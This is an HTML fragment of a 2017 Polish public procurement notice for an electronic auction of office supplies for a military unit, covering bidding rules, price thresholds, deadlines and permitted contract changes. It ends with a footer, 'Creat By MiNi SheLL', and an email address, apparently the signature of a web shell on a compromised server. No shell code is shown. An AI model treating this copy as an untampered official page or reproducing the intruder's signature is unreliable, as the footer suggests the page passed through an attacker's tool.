              <br /><div style="padding-left: 20px">1. Licytacja elektroniczna na dostawę materiałów i artykułów biurowych, będzie licytacją 1-etapową. 2. W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąp istnieje o otwarcia licytacji do jej zamknięcia. 3. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 4. W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką. 5. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 6. Zamawiający przyjął za minimalne postąpienie wartość 500,00 PLN brutto (słownie: pięćset złotych). 7. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych przez nich ofert, z tym że do momentu zamknięcia nie ujawni informacji umożliwiających identyfikację Wykonawców. 8. W celu zapewnienia aktualności listy postąpień niezbędne będzie samodzielne odświeżanie ekranu przy użyciu przycisku przeglądarki internetowej - system nie dokonuje odświeżania automatycznie. 9. Zamawiający przyjął za cenę wywoławczą kwotę brutto 260 000,00 PLN (słownie dwieście sześćdziesiąt tysięcy złotych) 10. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje w chwili zamknięcia licytacji elektronicznej najniższą cenę brutto za realizację całego zamówienia. 11. Cena oferty winna obejmować wszystkie koszty i składniki wraz z narzutami niezbędne do wykonania przedmiotu zamówienia. 12. Bezpośrednio po zamknięciu licytacji elektronicznej Zamawiający poda na swojej stronie internetowej nazwę oraz adres Wykonawcy, którego ofertę wybrano. 13. Formalności niezbędne do zawarci umowy jakie powinny zostać dopełnione po borze oferty: w celu zawarcia umowy Wykonawca winien: 1) przedłożyć pełnomocnictwo do zawarcia umowy, jeżeli nie wynika ono z treści wniosku o dopuszczenie do udziału w licytacji elektronicznej, 2) umowę regulującą współpracę, w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o zamówienie. 3) Przekazać drogą elektroniczną (fax, e-mail) informacje dotyczących danych do umowy (m.in. adres siedziby firmy, osoby do kontaktu) oraz inne niezbędne wynikające z treści umowy, wysokość kwoty netto wynikająca z oferty, 4) Złożyć wypełniony formularz asortymentowo-cenowy (stanowiący załącznik nr 2 do istotnych warunków umowy) zawierający ceny jednostkowe netto, wartość netto i brutto, stawkę VAT, nazwę producenta, nazwę produktu nadaną przez producenta i numer katalogowy producenta, sumę, która musi być identyczna z wylicytowaną kwotą. 5) Dla każdego artykułu z przedmiotu umowy wybrany Wykonawca musi złożyć dokumenty potwierdzające wymagania określone w opisie przedmiotu zamówienia np. karty produktu, opis przedmiotu itp. Niedopełnienie powyższych formalności stanowić będzie uchylenie się Wykonawcy od zawarcia Umowy. </div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja jednoetapowa
                  <br />Czas trwania: 30 min<br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

                Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: 
                <br />

                Data: 19/04/2017 godzina: 10:00<br />

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">5 dni po terminie przekazania zaproszeń o godz. 10:00</div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">Licytacja zakończy się w dniu otwarcia licytacji o godzinie 10:30. Zamawiający zamyka licytację, gdy w podstawowym czasie nie zostanie złożona żadna oferta (postąpienie).</div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Zgodnie ze wzorem istotnych warunków umowy, stanowiącym załącznik nr 4 do ogłoszenia.</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px">Wszelkie informacje, w celu sprawnego przeprowadzenia postępowania o udzielenie zamówienie w trybie licytacji elektronicznej znajdują się w załączniku nr 1 do ogłoszenia - Informacje dotyczące postępowania w trybie licytacji elektronicznej. Od momentu otwarcia licytacji do momentu zamknięcia licytacji, zgodnie z art. 77 ustawy Pzp, Zamawiający i Wykonawcy przekazują wnioski, oświadczenia i inne drogą elektroniczną, za pośrednictwem platformy licytacyjnej. Zaproszenie do udziału w licytacji elektronicznej przekazane zostanie Wykonawcom przez Zamawiającego drogą elektroniczną. Wszelkie informacje dotyczące niniejszego postępowania do momentu upływu terminu otwarcia licytacji, będą zamieszczane na stronie internetowej Zamawiającego http://1bltr.wp.mil.pl/pl/110.html. Wszelka korespondencja powinna być opatrzna nr sprawy tj. 10/2017. Załącznikami do niniejszego ogłoszenia, udostępnionymi na stronie internetowej Zamawiającego http://1bltr.wp.mil.pl/pl/110.html, są: 1) informacje dotyczące postępowania w trybie licytacji elektronicznej, 2)opis przedmiotu zamówienia, 3) wniosek o dopuszczenie do udziału w licytacji elektronicznej, 4) istotne warunki umowy, 5) wzór oświadczenia o spełnianiu warunków udziału, 6) wzór oświadczenia o raku podstaw wykluczenia, 7) wzór oświadczenia o przynależności / braku przynależności do grupy kapitałowej. </div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Dopuszcza się zmiany w zawartej umowie w zakresie: 1. terminu dostawy wynikająca z siły wyższej, 2. przepisów prawnych np. VAT, 3. określonego producenta, modelu i/lub typu przedmiotu umowy, w przypadku zakończenia jego produkcji lub wycofania go z produkcji, z tym że cena wskazana nie może ulec podwyższeniu, a parametry techniczne nie mogą być gorsze.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com